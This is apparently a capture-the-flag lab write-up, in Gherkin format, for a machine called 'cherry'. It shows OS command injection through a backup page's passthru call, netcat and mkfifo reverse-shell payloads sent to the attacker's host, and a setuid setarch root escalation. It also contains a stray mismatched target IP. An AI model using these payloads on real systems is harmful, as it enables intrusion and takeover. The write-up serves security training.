## Version 1.4.1
## language: en

Feature:
  TOE:
    cherry
  Category:
    Improper Neutralization of Special Elements used in a Command
    ('Command Injection')
  Location:
    http://172.16.33.4:7755/backup/command.php
  CWE:
    CWE-78: Improper Neutralization of Special Elements used in an OS Command
    ('OS Command Injection')
  Rule:
    REQ.173: https://fluidattacks.com/products/rules/list/173
  Goal:
    Get remote connection and root privileges
  Recommendation:
    It’d better disable functions which allow to an attacker execute commands
    in the system

  Background:
  Hacker's software:
    | <Software name>            | <Version>|
    | Kali Linux                 | 2020.4   |
    | Mozilla Firefox            | 78.3.0   |
    | netcat                     | 1.10     |
    | Nmap                       | 7.91     |
    | Burp Suit Community Edition| 2021.2.1 |
    | Gobuster                   | 3.0.1    |
    | StegCracker                | 2.1.0    |
    | SearchSploit               | 3.8.3    |

  TOE information:
    Given a .OVA file
    When I saw its extension
    Then I executed it on vmware
    Then I saw that the machine was running ubuntu 20.04.1 [evidence](01.png)
    Then I verified which IP was assigned to me by dhcp server with the command
    """
    ip add show vmnet1
    """
    And I got the next result
    """
    vmnet1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state
    UNKNOWN group default qlen 1000
    link/ether 00:50:56:c0:00:01 brd ff:ff:ff:ff:ff:ff
    inet 172.16.33.1/29 brd 172.16.33.7 scope global vmnet1
    valid_lft forever preferred_lft forever
    inet6 fe80::250:56ff:fec0:1/64 scope link
    valid_lft forever preferred_lft forever
    """
    And I scanned the network using nmap with the next command
    """
    nmap -sP 172.16.33.0/29
    """
    And I got the next result
    """
    Nmap scan report for 172.16.33.1
    Host is up (0.0016s latency).
    Nmap scan report for 172.16.33.4
    Host is up (0.00045s latency).
    """
    Then I knew that 192.168.103.5 was the target machine's IP address
    And I used nmap again to know which ports were opened with the command
    """
    nmap -p- -A 172.16.33.4
    """
    And I got the next result
    """
    PORT      STATE SERVICE VERSION
    22/tcp    open  ssh     OpenSSH 8.2p1 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey:
    |   3072 8b:c6:f5:6e:2c:a2:95:13:a5:10:84:a5:0c:83:b7:ae (RSA)
    |   256 38:d8:23:06:3e:86:2a:c9:0f:16:3f:23:93:d9:a1:06 (ECDSA)
    |_  256 95:b9:d4:f0:98:4a:d9:09:90:a4:5d:a7:9d:6d:ce:76 (ED25519)
    80/tcp    open  http    nginx 1.18.0 (Ubuntu)
    |_http-server-header: nginx/1.18.0 (Ubuntu)
    |_http-title: Cherry
    7755/tcp  open  http    Apache httpd 2.4.41 ((Ubuntu))
    |_http-server-header: Apache/2.4.41 (Ubuntu)
    |_http-title: Cherry
    33060/tcp open  mysqlx?
    1 service unrecognized despite returning data.
    If you know the service/version,
    please submit the following fingerprint at
    https://nmap.org/cgi-bin/submit.cgi?new-service :
    SF-Port33060-TCP:V=7.91%I=7%D=3/29%Time=60621E24%P=x86_64-pc-linux-gnu%r(G
    SF:enericLines,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(Help,9,"\x05\0\0\0\x0b\
    SF:x08\x05\x1a\0")%r(SIPOptions,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(ms-sql
    SF:-s,9,"\x05\0\0\0\x0b\x08\x05\x1a\0");
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    """
    Then I saw that port 80 was used by HTTP with nginx in its version 1.18.0
    And HTTP was using apache 2.4.41 on port 7755
    And port 33060 was used by MYSQL
    And SSH was using openSSH on port 22

  Scenario: Normal use case
    Given HTTP were working on ports 80 and 7755
    Then I accessed to the main webpage on 172.16.33.4:80 using browser
    And there I saw the following web site [evidence](02.png)
    Then I entered to 172.16.33.4:7755 using browser
    And thus I found the main webpage as it can see on [evidence](03.png)

  Scenario: Static detection
    Given I didn't have access to the source code
    Then I couldn't do this detection

  Scenario: Dynamic detection
    Given I didn't found out any wrong
    When I was analyzing the web server
    Then I downloaded the image in the main webpage
    Then I analyzed its content with StegCracker to find any hidden message
    And I didn't find anything
    Then I decided to search possible hidden directories with gobuster
    Then I got the following result for the web server on port 80
    """
    ===============================================================
    2021/03/29 12:44:32 Starting gobuster in directory enumeration mode
    ===============================================================
    /index.html   (Status: 200) [Size: 640]
    /backup       (Status: 301) [Size: 178] [--> http://172.16.33.4/backup/]
    /info.php     (Status: 200) [Size: 21]
    /.            (Status: 200) [Size: 640]
    ===============================================================
    2021/03/29 12:45:47 Finished
    ===============================================================
    """
    And for the webserver on port 7755 I got the output below
    """
    ===============================================================
    2021/03/29 12:50:16 Starting gobuster in directory enumeration mode
    ===============================================================
    /index.html (Status: 200) [Size: 640]
    /backup     (Status: 200) [Size: 178] [--> http://172.16.33.4:7755/backup/]
    /info.php   (Status: 200) [Size: 21]
    /.          (Status: 200) [Size: 640]
    ===============================================================
    2021/03/29 12:45:47 Finished
    ===============================================================
    """
    Then I accessed to info.php on port 80
    And I noted that the php interpreter was disable
    Then I inspected info.php on port 7755 [evidence](04.png)
    Then I entered to the backup directory on port 80 using burp suit
    And I looked that I couldn't access from that port [evidence](05.png)
    Then I entered to backup directory on port 7755 [evidence](06.png)
    Then I inspected the command.php file
    And thus I noted that it was using passthru
    Then I knew that I could execute commands inside the system
    Then I executed a command as it's shown in [evidence](07.png)
    Then I tried doing a remote connection with the command below
    """
    http://172.16.33.4:7755/backup/
    command.php?backup=nc 172.16.33.1 1234 -e /bin/sh
    """
    And it didn't work
    Then I put the port 1234 in listening mode using netcat
    Then I executed the following command to get a remote connection
    """
    http://172.16.33.4:7755/backup/command.php?backup=
    mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 172.16.33.1 1234 > /tmp/f
    """

  Scenario: Exploitation
    Given previously I'd put the port 1234 in listening mode
    Then I got remote connection [evidence](08.png)
    Then I inspected information about kernel
    """
    Linux cherry 5.4.0-45-generic #49-Ubuntu SMP Wed Aug 26 13:38:52 UTC 2020
    x86_64 x86_64 x86_64 GNU/Linux
    """
    Then I searched an exploit with searchsploit but I didn't find any for that
    Then I consulted the user privileges but it requested me for a password
    Then I searched about files with had setuid permission enable
    Then I found the files below
    """
    /usr/bin/fusermount
    /usr/bin/umount
    /usr/bin/at
    /usr/bin/mount
    /usr/bin/setarch
    /usr/bin/gpasswd
    /usr/bin/sudo
    /usr/bin/su
    /usr/bin/newgrp
    /usr/bin/pkexec
    /usr/bin/chsh
    /usr/bin/chfn
    /usr/bin/passwd
    /usr/lib/snapd/snap-confine
    /usr/lib/eject/dmcrypt-get-device
    /usr/lib/openssh/ssh-keysign
    /usr/lib/dbus-1.0/dbus-daemon-launch-helper
    /usr/lib/policykit-1/polkit-agent-helper-1
    """
    Then I tried getting the root privileges with some of them
    Then I researched about setarch
    And I found that I could get the root permissions with the command below
    """
    setarch $(arch) /bin/sh -p
    """
    And in that way I got the root privileges
    Then I listed files in the root directory
    Then I visualized the flag
    And finally I solved the challenge [evidence](09.png)

  Scenario: Remediation
    Given the system is vulnerable to a remote code execution attack
    And it's possible to execute command inside the system since web server
    And the setuid permission is enable in programs which have vulnerabilities
    Then it'd better disable functions that allow to execute commands to a user
    And thus it avoid getting information about the system since web server
    And check if programs which have setuid permission are weakness

  Scenario: Scoring
   Base: Attributes that are constants over time and organizations
     7.7/10 (High) - AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H/
   Temporal: Attributes that measure the exploit's popularity and fixability
     7.6/10 (High) - E:H/RL:O/RC:C/
   Environmental: Unique and relevant attributes to a specific user environment
     7.6/10 (High) - CR:L/IR:L/AR:L

  Scenario: Correlations
    No correlations have been found until date 2021-03-30
